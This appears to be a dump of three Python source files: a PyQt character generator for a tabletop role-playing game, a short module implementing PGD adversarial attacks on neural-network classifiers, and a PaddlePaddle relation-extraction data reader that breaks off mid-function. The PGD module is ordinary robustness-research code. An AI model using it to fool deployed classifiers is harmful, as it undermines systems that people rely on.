layout.addWidget(self.traitsInfoWidgets[-1])\r\n \r\n self.martialTabContainer.adjustSize()\r\n self.leymancyTabContainer.adjustSize()\r\n self.professionTabContainer.adjustSize()\r\n self.subtletyTabContainer.adjustSize()\r\n \r\n for traitWidget in self.traitsInfoWidgets:\r\n traitWidget.update()\r\n \r\n self.starting = False\r\n \r\n \r\n \r\n def update_file(self,show_update=False):\r\n if self.fileName == None:\r\n print(\"No file loaded\")\r\n pass\r\n else:\r\n if self.file == None:\r\n self.file = get_json(self.fileName)\r\n \r\n ### Widgets\r\n \r\n if self.file[\"character\"] != self.nameBox.toPlainText():\r\n self.file[\"character\"] = self.nameBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Character name -> \", self.nameBox.toPlainText()]))\r\n \r\n \r\n if self.file[\"race\"] != self.raceListBox.currentText():\r\n self.file[\"race\"] = self.raceListBox.currentText()\r\n self.changed_list.append(\"\".join([\"Race -> \", self.raceListBox.currentText()]))\r\n self.update_gui()\r\n \r\n if self.file[\"heritage\"] != self.heritageListBox.currentText():\r\n self.file[\"heritage\"] = self.heritageListBox.currentText()\r\n self.changed_list.append(\"\".join([\"Heritage -> \", self.heritageListBox.currentText()]))\r\n \r\n if 
self.file[\"rp_attributes\"][\"age\"] != self.ageBox.value():\r\n self.file[\"rp_attributes\"][\"age\"] = self.ageBox.value()\r\n self.changed_list.append(\"\".join([\"Age -> \", str(self.ageBox.value())]))\r\n \r\n if self.file[\"rp_attributes\"][\"height\"] != self.heightBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"height\"] = self.heightBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Height -> \", str(self.heightBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"weight\"] != self.weightBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"weight\"] = self.weightBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Weight -> \", str(self.weightBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"eyes\"] != self.eyeBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"eyes\"] = self.eyeBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Eye colour -> \", str(self.eyeBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"skin\"] != self.skinBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"skin\"] = self.skinBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Skin colour -> \", str(self.skinBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"hair\"] != self.hairBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"hair\"] = self.hairBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Hair colour -> \", str(self.hairBox.toPlainText())]))\r\n \r\n if self.file[\"rp_attributes\"][\"background\"] != self.backgroundBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"background\"] = self.backgroundBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Background modified\"]))\r\n \r\n if self.file[\"rp_attributes\"][\"notes\"] != self.notesBox.toPlainText():\r\n self.file[\"rp_attributes\"][\"notes\"] = self.notesBox.toPlainText()\r\n self.changed_list.append(\"\".join([\"Notes modified\"]))\r\n \r\n if self.file[\"rp_attributes\"][\"image\"] != self.imagePath:\r\n self.file[\"rp_attributes\"][\"image\"] = self.imagePath\r\n self.changed_list.append(\"\".join([\"Image path -> \",str(self.imagePath)]))\r\n \r\n for index,skillWidget in enumerate(self.skillsNameWidgets):\r\n skill = skillWidget.text()\r\n if self.skillsProfsWidgets[index].checkState() != self.file[\"skills\"][skill][\"proficiency\"]:\r\n self.file[\"skills\"][skill][\"proficiency\"] = self.skillsProfsWidgets[index].checkState()\r\n self.changed_list.append(\"\".join([skill,\" proficiency -> \",parseProficiency(self.file[\"skills\"][skill][\"proficiency\"])]))\r\n # Update proficiencies\r\n if self.skillsStatsWidgets[index].text() != parseStat(self.file[\"skills\"][skill][\"stat\"]):\r\n try: \r\n self.file[\"skills\"][skill][\"stat\"] = self.skillsStatsWidgets[index].text()\r\n self.changed_list.append(\"\".join([skill,\" stat -> \",self.file[\"skills\"][skill][\"stat\"]]))\r\n except:\r\n pass\r\n if self.skillsManualWidgets[index].value() != int(self.file[\"skills\"][skill][\"manual\"]):\r\n self.file[\"skills\"][skill][\"manual\"] = self.skillsManualWidgets[index].value()\r\n \r\n if int(self.skillsTotalWidgets[index].text()) != self.file[\"skills\"][skill][\"value\"]:\r\n self.file[\"skills\"][skill][\"value\"] = int(self.skillsTotalWidgets[index].text())\r\n \r\n for index, totalWidget in enumerate(self.attrsTotals):\r\n if totalWidget.text() == \"\":\r\n pass\r\n else:\r\n total = int(totalWidget.text())\r\n stat = self.attrsLabels[index].text()\r\n stat_string = deParseStat(stat)\r\n if total != 
self.file[\"stats\"][stat_string]:\r\n self.file[\"stats\"][stat_string] = total\r\n \r\n with open(self.fileName,\"w\") as f: \r\n json.dump(self.file,f,indent=4,sort_keys=True)\r\n \r\n self.update_gui()\r\n if show_update:\r\n msg = QMessageBox()\r\n msg.setWindowTitle(\"Updater\")\r\n msg.setText(\"File Updated!\")\r\n msg.setDetailedText(\"\\n\".join(self.changed_list))\r\n msg.setStandardButtons(QMessageBox.Ok)\r\n msg.exec_()\r\n self.changed_list = []\r\n \r\n \r\nclass rollWidget(QLabel):\r\n clicked = pyqtSignal()\r\n def __init__(self,parent,file=None,skill=\"Athletics\",index=0):\r\n super(rollWidget,self).__init__(parent)\r\n # self.file = file\r\n self.skill = skill\r\n self.index = index\r\n self.setFixedSize(25,25)\r\n dieImgFile = \"./bin/d20.png\"\r\n self.pixmap = QPixmap(dieImgFile)\r\n self.setPixmap(self.pixmap)\r\n self.clicked.connect(self.roll)\r\n \r\n def mouseReleaseEvent(self,QMouseEvent):\r\n if QMouseEvent.button() == Qt.LeftButton:\r\n self.clicked.emit()\r\n \r\n def roll(self):\r\n self.file = self.parent().parent().parent().parent().parent().file\r\n bonus = self.parent().parent().parent().parent().parent().skillsTotalWidgets[self.index].text()\r\n bonus = int(bonus)\r\n roll = math.ceil(np.random.rand()*20)\r\n total = int(bonus + roll)\r\n msg = QMessageBox()\r\n msg.setText(\"\".join([self.skill,\" roll: \\n\",str(total), \" (\",str(roll) + \"%+d\" %bonus,\")\"]))\r\n msg.setWindowTitle(self.skill)\r\n msg.exec()\r\n \r\nclass showRaceInfoWindow(QDialog):\r\n def __init__(self,parent=None,file=None):\r\n super(showRaceInfoWindow, self).__init__(parent) \r\n self.file = file\r\n self.setFixedWidth(600)\r\n \r\n mainLayout = QVBoxLayout()\r\n ### GET INFO\r\n race = self.file[\"race\"]\r\n self.setWindowTitle(race)\r\n raceDescription = info[\"races\"][race][\"description\"]\r\n baseHP = info[\"races\"][race][\"baseHP\"]\r\n baseSpeed = info[\"races\"][race][\"baseSpeed\"]\r\n size = info[\"races\"][race][\"size\"]\r\n abilitiesNames = []\r\n abilitiesDescriptions = []\r\n abilitiesModifiers = []\r\n for ability in info[\"races\"][race][\"abilities\"]:\r\n abilitiesNames.append(info[\"races\"][race][\"abilities\"][ability][\"name\"])\r\n abilitiesDescriptions.append(info[\"races\"][race][\"abilities\"][ability][\"description\"])\r\n abilitiesModifiers.append(info[\"races\"][race][\"abilities\"][ability][\"modifiers\"])\r\n startingStats = []\r\n for ststat in info[\"races\"][race][\"startingStats\"]:\r\n startingStats.append(ststat)\r\n maxStats = []\r\n for maxstat in info[\"races\"][race][\"maxStats\"]:\r\n maxStats.append(maxstat)\r\n ### IMAGE\r\n imageLayout = QVBoxLayout()\r\n imageContainer = QWidget()\r\n imageContainer.setLayout(imageLayout)\r\n raceImage = QLabel()\r\n imageContainer.setFixedHeight(300)\r\n imageContainer.setFixedWidth(300)\r\n pixmap = QPixmap(info[\"races\"][race][\"image\"])\r\n raceImage.setPixmap(pixmap)\r\n \r\n imageLayout.addWidget(raceImage)\r\n # imageLayout.addStretch()\r\n \r\n upperLayout = QHBoxLayout()\r\n upperContainer = QWidget()\r\n upperContainer.setLayout(upperLayout)\r\n \r\n ### DESCRIPTION\r\n RILayout = QGridLayout()\r\n RIContainer = QWidget()\r\n RIContainer.setLayout(RILayout)\r\n titleLabel1 = QLabel(\"Race: \")\r\n titleLabel2 = QLabel(race)\r\n descLabel1 = QLabel(\"Description: \")\r\n descLabel1.setAlignment(Qt.AlignTop)\r\n descLabel2=QLabel(raceDescription)\r\n descLabel2.setWordWrap(True)\r\n hpLabel1 = QLabel(\"Base HP: \")\r\n hpLabel2 = QLabel(str(baseHP))\r\n spdLabel1 = QLabel(\"Base 
Speed: \")\r\n spdLabel2 = QLabel(\" \".join([str(baseSpeed),\"ft\"]))\r\n sizeLabel1 = QLabel(\"Size: \")\r\n sizeLabel2 = QLabel(str(size))\r\n \r\n \r\n upperLayout.addWidget(RIContainer)\r\n upperLayout.addWidget(imageContainer)\r\n \r\n RILayout.addWidget(titleLabel1,0,0,1,1)\r\n RILayout.addWidget(titleLabel2,0,1,1,1)\r\n RILayout.addWidget(descLabel1,1,0,1,1)\r\n RILayout.addWidget(descLabel2,1,1,1,1)\r\n RILayout.addWidget(hpLabel1,2,0,1,1)\r\n RILayout.addWidget(hpLabel2,2,1,1,1)\r\n RILayout.addWidget(spdLabel1,3,0,1,1)\r\n RILayout.addWidget(spdLabel2,3,1,1,1)\r\n RILayout.addWidget(sizeLabel1,4,0,1,1)\r\n RILayout.addWidget(sizeLabel2,4,1,1,1)\r\n ### ABILITIES\r\n abLayout = QGridLayout()\r\n abContainer = QWidget()\r\n abContainer.setLayout(abLayout)\r\n \r\n abTitle = QLabel(\"Abilities:\")\r\n abDesc = QLabel(\"Description:\")\r\n abMod = QLabel(\"Modifiers:\")\r\n abilityNameWidgets = []\r\n abilityDescriptionWidgets = []\r\n abilityModifierWidgets = []\r\n if len(abilitiesNames) == len(abilitiesDescriptions) and len(abilitiesNames) == len(abilitiesModifiers):\r\n for i in range(0,len(abilitiesNames)):\r\n abilityNameWidgets.append(QLabel(abilitiesNames[i]))\r\n abilityNameWidgets[i].setAlignment(Qt.AlignTop)\r\n abilityDescriptionWidgets.append(QLabel(abilitiesDescriptions[i]))\r\n abilityDescriptionWidgets[i].setWordWrap(True)\r\n abilityModifierWidgets.append(QLabel(parseModifiers(abilitiesModifiers[i])))\r\n abLayout.addWidget(abilityNameWidgets[i],i+1,0,1,1)\r\n abLayout.addWidget(abilityDescriptionWidgets[i],i+1,1,1,1)\r\n abLayout.addWidget(abilityModifierWidgets[i],i+1,2,1,1)\r\n \r\n abLayout.addWidget(abTitle,0,0,1,1)\r\n abLayout.addWidget(abDesc,0,1,1,1)\r\n abLayout.addWidget(abMod,0,2,1,1)\r\n ### STATS\r\n statsWrapperLayout = QHBoxLayout()\r\n statsWrapperContainer = QWidget()\r\n statsWrapperContainer.setLayout(statsWrapperLayout)\r\n \r\n statsLayout = QGridLayout()\r\n statsContainer = QWidget()\r\n statsContainer.setLayout(statsLayout)\r\n \r\n statsSTR = QLabel(\"Strength\")\r\n statsDEX = QLabel(\"Dexterity\")\r\n statsCON = QLabel(\"Constitution\")\r\n statsINT = QLabel(\"Intelligence\")\r\n statsWIS = QLabel(\"Wisdom\")\r\n statsCHA = QLabel(\"Charisma\")\r\n \r\n baseSTR = QLabel(str(startingStats[0]))\r\n baseDEX = QLabel(str(startingStats[1]))\r\n baseCON = QLabel(str(startingStats[2]))\r\n baseINT = QLabel(str(startingStats[3]))\r\n baseWIS = QLabel(str(startingStats[4]))\r\n baseCHA = QLabel(str(startingStats[5]))\r\n \r\n maxSTR = QLabel(str(maxStats[0]))\r\n maxDEX = QLabel(str(maxStats[1]))\r\n maxCON = QLabel(str(maxStats[2]))\r\n maxINT = QLabel(str(maxStats[3]))\r\n maxWIS = QLabel(str(maxStats[4]))\r\n maxCHA = QLabel(str(maxStats[5]))\r\n \r\n baseTitle = QLabel(\"Min\")\r\n maxTitle = QLabel(\"Max\")\r\n \r\n statsLayout.addWidget(statsSTR,1,0,1,1)\r\n statsLayout.addWidget(statsDEX,2,0,1,1)\r\n statsLayout.addWidget(statsCON,3,0,1,1)\r\n statsLayout.addWidget(statsINT,4,0,1,1)\r\n statsLayout.addWidget(statsWIS,5,0,1,1)\r\n statsLayout.addWidget(statsCHA,6,0,1,1)\r\n \r\n statsLayout.addWidget(baseSTR,1,1,1,1)\r\n statsLayout.addWidget(baseDEX,2,1,1,1)\r\n statsLayout.addWidget(baseCON,3,1,1,1)\r\n statsLayout.addWidget(baseINT,4,1,1,1)\r\n statsLayout.addWidget(baseWIS,5,1,1,1)\r\n statsLayout.addWidget(baseCHA,6,1,1,1)\r\n \r\n statsLayout.addWidget(maxSTR,1,2,1,1)\r\n statsLayout.addWidget(maxDEX,2,2,1,1)\r\n statsLayout.addWidget(maxCON,3,2,1,1)\r\n statsLayout.addWidget(maxINT,4,2,1,1)\r\n 
statsLayout.addWidget(maxWIS,5,2,1,1)\r\n statsLayout.addWidget(maxCHA,6,2,1,1)\r\n \r\n statsLayout.addWidget(baseTitle,0,1,1,1)\r\n statsLayout.addWidget(maxTitle,0,2,1,1)\r\n statsLayout.setHorizontalSpacing(20)\r\n statsLayout.setVerticalSpacing(0)\r\n \r\n statsWrapperLayout.addWidget(statsContainer)\r\n statsWrapperLayout.addStretch()\r\n ### CLOSE BUTTON\r\n closeButtonLayout = QHBoxLayout()\r\n closeButtonContainer = QWidget()\r\n closeButtonContainer.setLayout(closeButtonLayout)\r\n \r\n closeButton = QPushButton(\"Exit\")\r\n closeButton.setFixedSize(100,25)\r\n closeButton.clicked.connect(self.close)\r\n closeButtonLayout.addStretch()\r\n closeButtonLayout.addWidget(closeButton)\r\n ### MAIN LAYOUT\r\n mainLayout.addWidget(upperContainer)\r\n mainLayout.addWidget(abContainer)\r\n mainLayout.addWidget(statsWrapperContainer)\r\n mainLayout.addWidget(closeButtonContainer)\r\n self.setLayout(mainLayout)\r\n\r\n\r\nclass showHeritageInfoWindow(QDialog):\r\n def __init__(self,parent=None,file=None):\r\n super(showHeritageInfoWindow, self).__init__(parent) \r\n self.setFixedWidth(600)\r\n self.file = file\r\n race = self.file[\"race\"]\r\n heritage = self.file[\"heritage\"]\r\n self.setWindowTitle(heritage)\r\n \r\n maxLayout = QHBoxLayout()\r\n \r\n main2Widget = QWidget()\r\n main2Layout = QVBoxLayout()\r\n main2Widget.setLayout(main2Layout)\r\n \r\n mainWidget = QWidget()\r\n mainLayout = QGridLayout()\r\n mainWidget.setLayout(mainLayout)\r\n main2Layout.addWidget(mainWidget)\r\n main2Layout.addStretch()\r\n \r\n rightWidget=QWidget()\r\n rightLayout = QVBoxLayout()\r\n rightWidget.setLayout(rightLayout)\r\n \r\n nameLabel = QLabel(\"Name:\")\r\n nameLabel.setAlignment(Qt.AlignTop)\r\n descLabel = QLabel(\"Description:\")\r\n descLabel.setAlignment(Qt.AlignTop)\r\n modifiersLabel = QLabel(\"Modifiers:\")\r\n modifiersLabel.setAlignment(Qt.AlignTop)\r\n mainLayout.addWidget(nameLabel,0,0,1,1)\r\n mainLayout.addWidget(descLabel,1,0,1,1)\r\n mainLayout.addWidget(modifiersLabel,2,0,1,1)\r\n \r\n nameVal = info[\"races\"][race][\"heritages\"][heritage][\"name\"]\r\n descVal = info[\"races\"][race][\"heritages\"][heritage][\"description\"]\r\n modifiersVal = info[\"races\"][race][\"heritages\"][heritage][\"modifiers\"]\r\n nameValLabel = QLabel(nameVal)\r\n nameValLabel.setAlignment(Qt.AlignLeft)\r\n descValLabel = QLabel(descVal)\r\n descValLabel.setAlignment(Qt.AlignLeft)\r\n descValLabel.setWordWrap(True)\r\n modifiersValLabel = QLabel(parseModifiers(modifiersVal))\r\n modifiersValLabel.setAlignment(Qt.AlignLeft)\r\n \r\n mainLayout.addWidget(nameValLabel,0,1,1,1)\r\n mainLayout.addWidget(descValLabel,1,1,1,1)\r\n mainLayout.addWidget(modifiersValLabel,2,1,1,1)\r\n \r\n imageLayout = QVBoxLayout()\r\n imageContainer = QWidget()\r\n imageContainer.setLayout(imageLayout)\r\n raceImage = QLabel()\r\n imageContainer.setFixedHeight(300)\r\n imageContainer.setFixedWidth(300)\r\n pixmap = QPixmap(info[\"races\"][race][\"heritages\"][heritage][\"image\"])\r\n raceImage.setPixmap(pixmap)\r\n \r\n imageLayout.addWidget(raceImage)\r\n \r\n closeButtonLayout = QHBoxLayout()\r\n closeButtonContainer = QWidget()\r\n closeButtonContainer.setLayout(closeButtonLayout)\r\n \r\n closeButton = QPushButton(\"Exit\")\r\n closeButton.setFixedSize(100,25)\r\n closeButton.clicked.connect(self.close)\r\n closeButtonLayout.addStretch()\r\n closeButtonLayout.addWidget(closeButton)\r\n \r\n rightLayout.addWidget(imageContainer)\r\n rightLayout.addWidget(closeButtonContainer)\r\n \r\n 
maxLayout.addWidget(main2Widget)\r\n maxLayout.addWidget(rightWidget)\r\n \r\n self.setLayout(maxLayout)\r\n \r\n \r\n \r\nclass statSelectBox(QComboBox):\r\n def __init__(self,parent=None,stats=None):\r\n super(statSelectBox,self).__init__(parent)\r\n self.activated.connect(lambda: self.parent().parent().parent().parent().parent().update_file(show_update=False))\r\n if stats == \"Any\" or stats == \"Any Physical\":\r\n self.addItem(\"Strength\")\r\n self.addItem(\"Dexterity\")\r\n self.addItem(\"Constitution\")\r\n if stats == \"Any\" or stats == \"Any Mental\":\r\n self.addItem(\"Intelligence\")\r\n self.addItem(\"Wisdom\")\r\n self.addItem(\"Charisma\")\r\n \r\n def text(self):\r\n return str(self.currentText())\r\n \r\n def getIndex(self,text):\r\n i = 0\r\n while i < 6:\r\n if self.itemText(i) == text:\r\n return i\r\n else:\r\n i += 1\r\n \r\nclass traitContainer(QFrame):\r\n def __init__(self,parent=None,category=None,trait=None):\r\n super(traitContainer,self).__init__(parent)\r\n traitDict = info[\"traits\"][category][trait]\r\n # self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)\r\n # self.setLineWidth(2)\r\n self.selected=False\r\n self.setFixedHeight(120)\r\n self.setFixedWidth(245)\r\n self.prerequisites_met = False\r\n self.trait_acquired = False\r\n self.category = category\r\n self.trait = trait\r\n self.setStyleSheet(\"background-color: rgb(80, 80, 80);border-radius: 8px;\")\r\n if self.trait_acquired:\r\n self.setStyleSheet(\"background-color:rgb(80, 80, 80);border-radius: 8px;border: 1px solid darkGreen;\")\r\n elif not self.prerequisites_met: \r\n self.setStyleSheet(\"background-color:rgb(80, 80, 80);border-radius: 8px;border: 1px solid darkRed;\")\r\n self.layout = QGridLayout()\r\n title = QLabel(info[\"traits\"][category][trait][\"name\"])\r\n # title.setWeight()\r\n title.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;font:bold\")\r\n self.descContainer = QScrollArea()\r\n self.descContainer.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;border-radius:0px\")\r\n traitLabel = QLabel(trait)\r\n prerequisites = QLabel(\"\".join([\"Prerequisites: \",\"\".join(info[\"traits\"][self.category][self.trait][\"prerequisites\"])]))\r\n prerequisites.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;color:darkGray\")\r\n self.layout.addWidget(prerequisites,1,0,1,2)\r\n traitLabel.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;color:darkGray\")\r\n desc = QLabel(info[\"traits\"][category][trait][\"description\"])\r\n desc.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px\")\r\n desc.setWordWrap(True)\r\n self.layout.addWidget(title,0,0,1,1)\r\n self.layout.addWidget(traitLabel,0,1,1,1)\r\n self.descContainer.setWidget(desc)\r\n self.setLayout(self.layout)\r\n \r\n def update(self):\r\n self.prerequisites_met = self.checkPrerequisites()\r\n if self.selected:\r\n self.setStyleSheet(\"background-color:rgb(80,80,80);border-radius:8px;border:1px solid White;\")\r\n desc = QLabel(info[\"traits\"][self.category][self.trait][\"description\"])\r\n desc.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px\")\r\n desc.setWordWrap(True)\r\n modifs = QLabel(parseModifiers(info[\"traits\"][self.category][self.trait][\"modifiers\"]))\r\n modifs.setStyleSheet(\"background-color:rgb(80, 80, 80);border:0px;color:darkGray\")\r\n self.layout.addWidget(self.descContainer,2,0,1,2)\r\n self.layout.addWidget(modifs,3,0,1,2)\r\n self.setFixedHeight(180)\r\n elif self.trait_acquired:\r\n self.setStyleSheet(\"background-color:rgb(80, 80, 
80);border-radius: 8px;border: 1px solid darkGreen;\")\r\n elif not self.prerequisites_met: \r\n self.setStyleSheet(\"background-color:rgb(80, 80, 80);border-radius: 8px;border: 1px solid darkRed;\")\r\n else:\r\n self.setStyleSheet(\"background-color: rgb(80, 80, 80);border-radius: 8px;\")\r\n \r\n if not self.selected:\r\n self.setFixedHeight(120)\r\n self.layout.removeWidget(self.descContainer)\r\n self.descContainer.setParent(None)\r\n \r\n self.parent().adjustSize()\r\n\r\n def mousePressEvent(self,event):\r\n if event.button() == Qt.LeftButton:\r\n self.setStyleSheet(\"background-color:rgb(80,80,80);border-radius:8px;border:1px solid White;\")\r\n if self.selected:\r\n self.selected = False\r\n self.update()\r\n else:\r\n for trait in self.parent().parent().parent().parent().parent().parent().parent().parent().parent().parent().traitsInfoWidgets:\r\n if trait.selected:\r\n trait.selected = False\r\n trait.update()\r\n self.selected=True\r\n self.update()\r\n \r\n \r\n def checkPrerequisites(self):\r\n return True\r\n\r\ndef parseModifiers(modifiersDict):\r\n retnString = \"\"\r\n for i in modifiersDict:\r\n # print(info[\"modifiers\"][i])\r\n retnString = \"\".join([retnString,info[\"modifiers\"][i][\"name\"], \": \", \"%+5d\" %modifiersDict[i],\"\\n\"])\r\n return retnString\r\n\r\ndef parseStat(statString):\r\n try:\r\n return info[\"modifiers\"][statString][\"name\"]\r\n except:\r\n return statString\r\n \r\n\r\ndef deParseStat(statString):\r\n for key in info[\"modifiers\"].keys():\r\n if info[\"modifiers\"][key][\"name\"] == statString:\r\n return key\r\n\r\n\r\ndef getMainStatModif(statScore):\r\n return math.floor((statScore - 10)/2)\r\n\r\ndef parseProficiency(prof):\r\n if prof == 0:\r\n return \"\"\r\n elif prof == 1:\r\n return \"Proficiency\"\r\n elif prof == 2:\r\n return \"Expertise\"\r\n else:\r\n return \"\"\r\n \r\ndef getTotalModifier(modifiersList,attrString):\r\n total = 0\r\n for group in modifiersList:\r\n if attrString in group.keys():\r\n val = group[attrString]\r\n total += val\r\n return total\r\n\r\ndef genModifsDict(modifiersList):\r\n keys = []\r\n for group in modifiersList:\r\n for key in group.keys():\r\n if key not in keys:\r\n keys.append(key)\r\n modifsDict = dict()\r\n for key in keys:\r\n modifsDict[key] = 0\r\n for group in modifiersList:\r\n if key in group.keys():\r\n modifsDict[key] += group[key]\r\n return modifsDict\r\n \r\n \r\nif __name__ == '__main__':\r\n\r\n import sys\r\n\r\n app = QApplication(sys.argv)\r\n app.setStyle(\"Fusion\")\r\n dark_palette = QPalette()\r\n \r\n dark_palette.setColor(QPalette.Window, QColor(53, 53, 53))\r\n dark_palette.setColor(QPalette.WindowText, Qt.white)\r\n dark_palette.setColor(QPalette.Base, QColor(25, 25, 25))\r\n dark_palette.setColor(QPalette.AlternateBase, QColor(53, 53, 53))\r\n dark_palette.setColor(QPalette.ToolTipBase, Qt.white)\r\n dark_palette.setColor(QPalette.ToolTipText, Qt.white)\r\n dark_palette.setColor(QPalette.Text, Qt.white)\r\n dark_palette.setColor(QPalette.Button, QColor(53, 53, 53))\r\n dark_palette.setColor(QPalette.ButtonText, Qt.white)\r\n dark_palette.setColor(QPalette.BrightText, Qt.red)\r\n dark_palette.setColor(QPalette.Link, QColor(42, 130, 218))\r\n dark_palette.setColor(QPalette.Highlight, QColor(42, 130, 218))\r\n dark_palette.setColor(QPalette.HighlightedText, Qt.black)\r\n app.setPalette(dark_palette)\r\n app.setStyleSheet(\"QToolTip { color: #ffffff; background-color: #2a82da; border: 1px solid white; }\")\r\n\r\n root = Tk()\r\n root.withdraw()\r\n charGen = 
mainWindow()\r\n charGen.show()\r\n sys.exit(app.exec_()) \r\n","repo_name":"Cameron-Spence/abril-theia-character-gen","sub_path":"character-gen.py","file_name":"character-gen.py","file_ext":"py","file_size_in_byte":56921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20363425266","text":"from advertorch.attacks import LinfPGDAttack\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\ndef get_pgd_adversary(model, eps, num_iter, lr, rand_init, seed):\n\n adversary = LinfPGDAttack(model, loss_fn=nn.CrossEntropyLoss(reduction=\"sum\"), eps=eps, nb_iter=num_iter,\n rand_init=rand_init, eps_iter=lr, clip_min=0.0, clip_max=1.0)\n return adversary\n\n\ndef pgd_attack(model, input, target, eps, num_iter, lr, rand_init, seed):\n\n x = input.detach()\n\n if rand_init:\n x += torch.zeros_like(x).uniform_(-eps, eps)\n\n for i in range(num_iter):\n x.requires_grad_()\n with torch.enable_grad():\n logits = model(x)\n loss = F.cross_entropy(logits, target, size_average=False)\n grad = torch.autograd.grad(loss, [x])[0]\n x = x.detach() + lr * torch.sign(grad.detach())\n x = torch.min(torch.max(x, input - eps), input + eps)\n\n x = torch.clamp(x, 0, 1)\n\n return x\n","repo_name":"JEONGHYUN-LEE/APD","sub_path":"attacks.py","file_name":"attacks.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4705333517","text":"import paddle\nimport paddle.fluid as fluid\n\nimport data_reader\n\nimport my_model\nimport mymodel\n\nimport json\nimport os\nimport sys\n\nclass RcDataReader(object):\n def __init__(self,\n charemb_dict_path,\n wordemb_dict_path,\n postag_dict_path,\n label_dict_path,\n train_data_path,\n eval_data_path):\n self._charemb_dict_path = charemb_dict_path\n self._wordemb_dict_path = wordemb_dict_path\n self._postag_dict_path = postag_dict_path\n self._label_dict_path = label_dict_path\n self._train_data_path = train_data_path\n self._eval_data_path = eval_data_path\n\n self._dict_path_dict = {'charemb_dict': self._charemb_dict_path,\n 'wordemb_dict': self._wordemb_dict_path,\n 'postag_dict': self._postag_dict_path,\n 'label_dict': self._label_dict_path}\n\n for input_dict in [charemb_dict_path, wordemb_dict_path, postag_dict_path, label_dict_path, train_data_path,\n eval_data_path]:\n if not os.path.exists(input_dict):\n raise ValueError(\"%s not found.\" % input_dict)\n return\n\n self._feature_dict = {}\n self._feature_dict['charemb_dict'] = self._load_dict_from_file(self._dict_path_dict['charemb_dict'])\n self._feature_dict['postag_dict'] = self._load_dict_from_file(self._dict_path_dict['postag_dict'])\n self._feature_dict['wordemb_dict'] = self._load_dict_from_file(self._dict_path_dict['wordemb_dict'])\n self._feature_dict['label_dict'] = self._load_dict_from_file(self._dict_path_dict['label_dict'])\n\n self._UNK_IDX = 0\n\n\n\n def _load_dict_from_file(self, dict_path):\n \"\"\"\n Load vocabulary from file.\n \"\"\"\n return json.load(open(dict_path, mode='r', encoding='utf-8'))\n\n def _is_valid_input_data(self, dic):\n \"\"\"is the input data valid\"\"\"\n if \"text\" not in dic or \"postag\" not in dic or \\\n type(dic[\"postag\"]) is not list:\n return False\n for item in dic['postag']:\n if \"word\" not in item or \"pos\" not in item:\n return False\n return True\n\n def _get_feed_iterator(self, dic, need_input=False, need_label=True):\n # verify that the input format of each line meets the format\n if 
not self._is_valid_input_data(dic):\n            print('Format error', file=sys.stderr)\n            return None\n        sentence = dic['text']\n        sentence_char_list = [char for char in sentence]\n        sentence_term_list = []\n        for postag in dic['postag']:\n            word = postag['word']\n            for char in word:\n                sentence_term_list.append(word)\n        sentence_pos_list = []\n        for postag in dic['postag']:\n            word = postag['word']\n            pos = postag['pos']\n            sentence_pos_list.append('B-' + pos)\n            if len(word) == 2:\n                sentence_pos_list.append('E-' + pos)\n            elif len(word) > 2:\n                for i in word[1: -1]:\n                    sentence_pos_list.append('I-' + pos)\n                sentence_pos_list.append('E-' + pos)\n\n        sentence_char_slot = [self._feature_dict['charemb_dict'][1].get(c, self._UNK_IDX) for c in sentence_char_list]\n        sentence_emb_slot = [self._feature_dict['wordemb_dict'][1].get(w, self._UNK_IDX) \\\n                for w in sentence_term_list]\n        sentence_pos_slot = [self._feature_dict['postag_dict'][1].get(pos, self._UNK_IDX) \\\n                for pos in sentence_pos_list]\n        label_slot = [self._feature_dict['label_dict'][1]['O']] * len(sentence_term_list)\n        subject = dic['subject']\n        if subject != \"NaN\":\n            index = sentence.find(subject)\n            label_slot[index] = self._feature_dict[\"label_dict\"][1]['B-SUB']\n            if len(subject) >= 2:\n                for i in range(1, len(subject) - 1):\n                    label_slot[index + i] = self._feature_dict[\"label_dict\"][1]['I-SUB']\n                label_slot[index + len(subject) - 1] = self._feature_dict[\"label_dict\"][1]['E-SUB']\n        # verify that the feature is valid\n        if len(sentence_emb_slot) == 0 or len(sentence_pos_slot) == 0 or len(sentence_char_list) == 0 \\\n                or len(label_slot) == 0:\n            return None\n        # feature_slot = [sentence_emb_slot, sentence_pos_slot]\n        # feature_slot = [sentence_char_slot, sentence_emb_slot, sentence_pos_slot]\n        feature_slot = [sentence_char_slot]\n\n        input_fields = json.dumps(dic, ensure_ascii=False).encode('utf-8')\n        output_slot = feature_slot\n        if need_input:\n            output_slot = [input_fields] + output_slot\n        if need_label:\n            output_slot = output_slot + [label_slot]\n        return output_slot\n\n    def path_reader(self, data_path, need_input=False, need_label=True):\n        \"\"\"Read data from data_path\"\"\"\n        self._feature_dict['data_keylist'] = []\n        def reader():\n            \"\"\"Generator\"\"\"\n            if os.path.isdir(data_path):\n                input_files = os.listdir(data_path)\n                for data_file in input_files:\n                    data_file_path = os.path.join(data_path, data_file)\n                    for dic in 